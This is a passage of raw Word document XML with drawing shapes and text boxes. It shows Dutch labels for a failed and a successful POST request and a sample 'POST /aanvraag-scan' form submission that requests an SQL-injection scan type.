                              <w:t xml:space="preserve">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A0E74F" id="Text Box 504" o:spid="_x0000_s1072" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.85pt;margin-top:1.15pt;width:460.05pt;height:18.2pt;z-index:25191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EPtqkCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bhIRCxAalIKpKFFCh&#10;4ux4bbKq7XHtSbLh13fs3Q0pbVVRNYfNeN7zzeP0rLGGrVWINbiSDw8GnCknoardY8m/3l++O+Ys&#10;onCVMOBUybcq8rPZ2zenGz9VI1iCqVRg5MTF6caXfInop0UR5VJZEQ/AK0dCDcEKpGd4LKogNuTd&#10;mmI0GBwVGwiVDyBVjMS9aIV8lv1rrSTeaB0VMlNyyg3zN+TvIn2L2amYPgbhl7Xs0hD/kIUVtaOg&#10;O1cXAgVbhfoXV7aWASJoPJBgC9C6lirXQNUMBy+quVsKr3ItBE70O5ji/3Mrr9e3gdVVySeDMWdO&#10;WGrSvWqQfYCGJR4htPFxSop3nlSxIQF1uudHYqbCGx1s+qeSGMkJ6+0O3+ROEnNyPB4dHU44kyQb&#10;HQ6H49yA4tnah4gfFViWiJIH6l+GVayvIlImpNqrpGARTF1d1sbkR5oZdW4CWwvqtpBSORxlc7Oy&#10;n6Fq+eMB/dq+E5umo2Uf9WwKkacvecoBfwpi3N/iYpOxSW6es6NXa6nyTHbFJFxb/DKFW6OSd+O+&#10;KE09yTD+sbI+StZOWppweI1hp59M26xeY7yzyJHB4c7Y1g5CRn0HY4tw9a1PWbf6hO5e3YnEZtHk&#10;YTw86edrAdWWxi5Au7rRy8uaZuNKRLwVgXaVJo3uD97QRxvYlBw6irMlhKff8ZM+rRBJOdvQ7pc8&#10;fl+JoDgznxwt18lwTJPJMD/Gk/cjeoR9yWJf4lb2HGjghnTpvMxk0kfTkzqAfaAzNU9RSSScpNgl&#10;x548x/Yi0ZmTaj7PSnQevMArd+dlcp1gTpN/3zyI4Lv1QFqsa+ivhJi+2JJWN1k6mK8QdJ1XKAHd&#10;oto1gE5LHvTuDKbbtf/OWs/HevYDAAD//wMAUEsDBBQABgAIAAAAIQA4onYu4AAAAAgBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI8xT8MwFIR3JP6D9ZDYWqdJIVYap4IihNqJpgwd3fiRRI2fo9hNA78e&#10;M8F4utPdd/l6Mh0bcXCtJQmLeQQMqbK6pVrCx+F1JoA5r0irzhJK+EIH6+L2JleZtlfa41j6moUS&#10;cpmS0HjfZ5y7qkGj3Nz2SMH7tINRPsih5npQ11BuOh5H0SM3qqWw0KgeNw1W5/JiJBy/d89vD9u0&#10;Oowv8ft+m5Qozhsp7++mpxUwj5P/C8MvfkCHIjCd7IW0Y52E2XKRhqiEOAEWfJGKJbCThESkwIuc&#10;/z9Q/AAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAA&#10;W0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAA&#10;AAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCVcQ+2qQIAAPQFAAAOAAAAAAAAAAAA&#10;AAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQA4onYu4AAAAAgBAAAPAAAAAAAA&#10;AAAAAAAAAAEFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAADgYAAAAA&#10;" fillcolor="#f7caac [1301]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="72149197" w14:textId="6E0C6F2C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t xml:space="preserve">Gefaalde </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>POST</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C80AF8">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251926528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28FDE5FE" wp14:editId="141C6EFC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2414905</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5905500" cy="231140"/>
                <wp:effectExtent l="0" t="0" r="38100" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="193" name="Text Box 193"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5905500" cy="231140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent6">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6DD1F51" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5" w:rsidP="00710940">
                            <w:r w:rsidRPr="00020970">
                              <w:t xml:space="preserve">Succesvol </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00020970">
                              <w:t>POST</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00020970">
                              <w:t xml:space="preserve">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FDE5FE" id="Text Box 193" o:spid="_x0000_s1073" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.8pt;margin-top:190.15pt;width:465pt;height:18.2pt;z-index:25192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cbUqUCAAD0BQAADgAAAGRycy9lMm9Eb2MueG1srFTdb9MwEH9H4n+w/M6Sdu1g1dKpbBpCGtvE&#10;hvbsOvYaYfuM7TYpfz1nO2nLAKEh+pCe7/t+93F23mlFNsL5BkxFR0clJcJwqBvzVNEvD1dv3lHi&#10;AzM1U2BERbfC0/P561dnrZ2JMaxA1cIRdGL8rLUVXYVgZ0Xh+Upo5o/ACoNCCU6zgE/3VNSOtehd&#10;q2JclidFC662DrjwHrmXWUjnyb+UgodbKb0IRFUUcwvp69J3Gb/F/IzNnhyzq4b3abB/yEKzxmDQ&#10;natLFhhZu+YXV7rhDjzIcMRBFyBlw0WqAasZlc+quV8xK1ItCI63O5j8/3PLbzZ3jjQ19u70mBLD&#10;NDbpQXSBvIeORB4i1Fo/Q8V7i6qhQwFqD3yPzFh4J52O/1gSQTlivd3hG91xZE5Py+m0RBFH2fh4&#10;NJqkBhR7a+t8+CBAk0hU1GH/Eqxsc+0DZoKqg0oM5kE19VWjVHrEmREXypENw24zzoUJJ8lcrfUn&#10;qDN/UuIv9x3ZOB2ZfTKwMUSavugpBfwpiDJ/ixu6hE10s88OX9lSpJnsi4m4ZvwSFbZKRO/KfBYS&#10;e5Jg/GNlQ5SkHbUk4vASw14/muasXmK8s0iRwYSdsW4MuIT6DsaMcP11SFlmfUT3oO5Ihm7ZpWHM&#10;gxFZS6i3OHYO8up6y68anI1r5sMdc7irOE54f8ItfqSCtqLQU5SswH3/HT/q4wqhlJIWd7+i/tua&#10;OUGJ+mhwuU5HE0yAhPSYTN+O8eEOJctDiVnrC8CBG+GlszyRUT+ogZQO9COeqUWMiiJmOMauaBjI&#10;i5AvEp45LhaLpITnwbJwbe4tj64jzHHyH7pH5my/HgEX6waGK8Fmz7Yk60ZLA4t1ANmkFdqj2jcA&#10;T0sa9P4Mxtt1+E5a+2M9/wEAAP//AwBQSwMEFAAGAAgAAAAhAM+2gcHdAAAACwEAAA8AAABkcnMv&#10;ZG93bnJldi54bWxMj8FOwzAQRO9I/IO1SNxaJ21prTSbqiD1jNJy4ebG2yQiXkexk4a/x5zguJqn&#10;mbf5YbadmGjwrWOEdJmAIK6cablG+LicFgqED5qN7hwTwjd5OBSPD7nOjLtzSdM51CKWsM80QhNC&#10;n0npq4as9kvXE8fs5garQzyHWppB32O57eQqSbbS6pbjQqN7emuo+jqPFuH4XlbjLlWKVi/zRJ9l&#10;E+j0ivj8NB/3IALN4Q+GX/2oDkV0urqRjRcdwmKTbiOKsFbJGkQklFIbEFeEmOxAFrn8/0PxAwAA&#10;//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVu&#10;dF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEA&#10;AF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHKXG1KlAgAA9AUAAA4AAAAAAAAAAAAAAAAALAIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAM+2gcHdAAAACwEAAA8AAAAAAAAAAAAAAAAA&#10;/QQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAHBgAAAAA=&#10;" fillcolor="#c5e0b3 [1305]" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="56DD1F51" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00020970" w:rsidRDefault="00CE4BB5" w:rsidP="00710940">
                      <w:r w:rsidRPr="00020970">
                        <w:t xml:space="preserve">Succesvol </w:t>
                      </w:r>
                      <w:proofErr w:type="gramStart"/>
                      <w:r w:rsidRPr="00020970">
                        <w:t>POST</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r w:rsidRPr="00020970">
                        <w:t xml:space="preserve"> Request</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A42AC4">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251934720" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="53DBF14D" wp14:editId="4CA39F7A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5704840</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6075045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02" name="Curved Left Arrow 202"/>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ED1CAC" id="Curved Left Arrow 202" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:449.2pt;margin-top:478.35pt;width:22pt;height:45pt;z-index:251934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vTyp4CAADCBQAADgAAAGRycy9lMm9Eb2MueG1srFTBbtswDL0P2D8Iuq+Og3RdgzpFkKLDgKAt&#10;2g49K7IUG5BFjVLiZF8/SnactCs2YNhFFk3ykXwieXW9awzbKvQ12ILnZyPOlJVQ1nZd8O/Pt5++&#10;cOaDsKUwYFXB98rz69nHD1etm6oxVGBKhYxArJ+2ruBVCG6aZV5WqhH+DJyypNSAjQgk4jorUbSE&#10;3phsPBp9zlrA0iFI5T39vemUfJbwtVYy3GvtVWCm4JRbSCemcxXPbHYlpmsUrqpln4b4hywaUVsK&#10;OkDdiCDYBuvfoJpaInjQ4UxCk4HWtVSpBqomH72p5qkSTqVaiBzvBpr8/4OVd9sHZHVZ8PFozJkV&#10;DT3SYoNbVbKl0oHNEaFlUUlUtc5PyePJPWAvebrGuncam/ilitgu0bsf6FW7wCT9HF9cTkb0CJJU&#10;5xf5Od0JJTs6O/Thq4KGxUvBZUojZpGSSPyK7dKHzutgHcN6MHV5WxuThNg8amGQbQU9+2qdcqc4&#10;r6yM/Ztj2OV9gieOBBM9s0hFV3y6hb1REc/YR6WJz1huSjh18jEZIaWyIe9UlShVlyNxMbAxeCRu&#10;EmBE1lTdgN0DvC70gN3R09tHV5UGYXAe/SmxznnwSJHBhsG5qS3gewCGquojd/YHkjpqIksrKPfU&#10;bQjdGHonb2t66aXw4UEgzR01B+2ScE+HNtAWHPobZxXgz/f+R3saB9Jy1tIcF9z/2AhUnJlvlgbl&#10;Mp9M4uAnYXJ+MSYBTzWrU43dNAugnslpazmZrtE+mMNVIzQvtHLmMSqphJUUm3o14EFYhG6/0NKS&#10;aj5PZjTsToSlfXIygkdWY/s+714Eur7dA83JHRxmXkzftHpnGz0tzDcBdJ3m4MhrzzctitQ4/VKL&#10;m+hUTlbH1Tv7BQAA//8DAFBLAwQUAAYACAAAACEAa1Z1It4AAAAMAQAADwAAAGRycy9kb3ducmV2&#10;LnhtbEyPwU7DMAyG70i8Q2QkbizZVEraNZ3QJCSGxIHB7llj2orGqZpsK2+POcHRvz/9/lxtZj+I&#10;M06xD2RguVAgkJrgemoNfLw/3WkQMVlydgiEBr4xwqa+vqps6cKF3vC8T63gEoqlNdClNJZSxqZD&#10;b+MijEi8+wyTt4nHqZVushcu94NcKZVLb3viC50dcdth87U/eQOvuQ45zTv9jDtSQW6XY/9yMOb2&#10;Zn5cg0g4pz8YfvVZHWp2OoYTuSgGA7rQGaMGivv8AQQTRbbi5MioyjiSdSX/P1H/AAAA//8DAFBL&#10;AQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBl&#10;c10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxz&#10;Ly5yZWxzUEsBAi0AFAAGAAgAAAAhABhr08qeAgAAwgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAGtWdSLeAAAADAEAAA8AAAAAAAAAAAAAAAAA9gQAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAABBgAAAAA=&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00682D1F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251928576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BFADB2C" wp14:editId="2854591C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-269875</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5504180</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5867400" cy="726440"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="196" name="Text Box 196"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5867400" cy="7264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82E2E2F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">POST </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>aanvraag</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>scan HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5EAE846F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="681B7B7A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="009B27DA" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>naam</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>Pim&amp;email</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>mail@email.nl&amp;type-scan</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>=</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="009B27DA">
                              <w:rPr>
                                <w:color w:val="000000" w:themeColor="text1"/>
                              </w:rPr>
                              <w:t>SQLi</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="015CD968" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D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FADB2C" id="Text Box 196" o:spid="_x0000_s1074" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-21.25pt;margin-top:433.4pt;width:462pt;height:57.2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X2S4cCAACNBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW5UCFSnqQEyTECBg&#10;4tl1bGrN8Xn2tUn31+/sJKVivDDtJTnf/e774/yirS3bqhANuJKPj0acKSehMu6l5D+err+cchZR&#10;uEpYcKrkOxX5xeLzp/PGz9UE1mArFRgZcXHe+JKvEf28KKJcq1rEI/DKkVBDqAXSM7wUVRANWa9t&#10;MRmNZkUDofIBpIqRuFedkC+yfa2VxDuto0JmS06xYf6G/F2lb7E4F/OXIPzayD4M8Q9R1MI4cro3&#10;dSVQsE0wf5mqjQwQQeORhLoArY1UOQfKZjx6k83jWniVc6HiRL8vU/x/ZuXt9j4wU1HvzmacOVFT&#10;k55Ui+wrtCzxqEKNj3MCPnqCYksCQg/8SMyUeKtDnf6UEiM51Xq3r28yJ4l5fDo7mY5IJEl2MplN&#10;p7kBxau2DxG/KahZIkoeqH+5rGJ7E5EiIegASc4cXBtrcw+tS4wI1lSJlx9piNSlDWwrqP3Y5qDJ&#10;xAGKXp2mysPSe0kJd4llCndWJYPWPShNxcr5veNBSKkcDl4yOqE0xfMRxR6fVLuoPqK818ieweFe&#10;uTYOQq5m3q7XwlQ/h5B1h6c6H+SdSGxXbZ6S6b7xK6h2NA8Bup2KXl4batqNiHgvAi0R9ZkOA97R&#10;R1toSg49xdkawu/3+AlPs01SzhpaypLHXxsRFGf2u6OpPxunkWGYH9Pjkwk9wqFkdShxm/oSqPFj&#10;OkFeZjLh0Q6kDlA/0/1YJq8kEk6Sb5qUgbzE7lTQ/ZFqucwg2lsv8MY9eplMpzKnkXxqn0Xw/dwi&#10;TfwtDOsr5m/Gt8MmTQfLDYI2ebZTobuq9g2gnc8j39+ndFQO3xn1ekUXfwAAAP//AwBQSwMEFAAG&#10;AAgAAAAhAP9CR4/jAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwkAQhu8mvsNmTLzBto3W&#10;tXZKFEJiCB4AQzwu7do2dmeb7gLl7R1OepyZL/98fz4bbSdOZvCtI4R4GoEwVLqqpRrhc7ecKBA+&#10;aKp058ggXIyHWXF7k+uscmfamNM21IJDyGcaoQmhz6T0ZWOs9lPXG+LbtxusDjwOtawGfeZw28kk&#10;ilJpdUv8odG9mTem/NkeLcL77rLaPM0/Urt6W3yt99Lvl4s14v3d+PoCIpgx/MFw1Wd1KNjp4I5U&#10;edEhTB6SR0YRVJpyByaUinlzQHhWcQKyyOX/DsUvAAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA&#10;+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgA&#10;AAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgA&#10;AAAhAD1V9kuHAgAAjQUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAG&#10;AAgAAAAhAP9CR4/jAAAACwEAAA8AAAAAAAAAAAAAAAAA3wQAAGRycy9kb3ducmV2LnhtbFBLBQYA&#10;AAAABAAEAPMAAADvBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="382E2E2F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t xml:space="preserve">POST </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>aanvraag</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>-</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>scan HTTP</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="808030"/>
                        </w:rPr>
                        <w:t>/</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                        <w:t>1.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5EAE846F" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="008000"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="681B7B7A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="009B27DA" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                      <w:pPr>
                        <w:pStyle w:val="HTMLPreformatted"/>
                        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>naam</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>Pim&amp;email</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>mail@email.nl&amp;type-scan</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>=</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="009B27DA">
                        <w:rPr>
                          <w:color w:val="000000" w:themeColor="text1"/>
                        </w:rPr>
                        <w:t>SQLi</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="015CD968" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00682D1F">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251930624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39246EB1" wp14:editId="64A52799">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-260350</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>6416040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="1018540"/>
                <wp:effectExtent l="0" t="0" r="18415" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="200" name="Text Box 200"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5874385" cy="1018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D3CDCAE" w14:textId="5D542521" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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32EAD647" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3FD4320" w14:textId="67C11226" w:rsidR="00CE4BB5" w:rsidRPr="00D60785" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                            <w:pPr>
